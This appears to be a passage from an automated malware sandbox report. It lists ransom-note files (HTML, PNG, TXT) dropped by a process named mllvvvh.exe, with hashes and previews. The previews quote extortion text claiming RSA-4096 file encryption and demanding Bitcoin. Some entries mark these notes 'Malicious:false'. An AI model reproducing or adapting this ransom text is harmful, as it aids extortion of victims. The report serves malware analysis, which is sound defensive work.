                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
